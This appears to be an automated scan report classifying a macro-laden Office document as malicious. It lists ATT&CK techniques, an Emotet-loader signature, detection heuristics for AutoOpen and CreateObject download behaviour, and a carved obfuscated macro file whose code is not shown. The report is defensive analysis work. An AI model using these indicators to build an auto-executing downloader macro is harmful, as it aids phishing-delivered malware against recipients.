Verdict: MALICIOUS
Risk score: 224
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that calls CreateObject, most likely to download and execute a second-stage payload. The ClamAV detection Doc.Malware.Emodldr-10025032-0 further confirms its malicious nature. The VBA code is heavily obfuscated, but the combination of AutoOpen and CreateObject strongly suggests downloader or dropper functionality.
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43480 bytes |

SHA-256: bce9897f832f00fd017291b0aff090d9d3463349935ac9a329e7652b44cf7d3b
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 25 long base64-like blobs).
Preview script: first 1,000 lines of the extracted script (obfuscated VBA, truncated)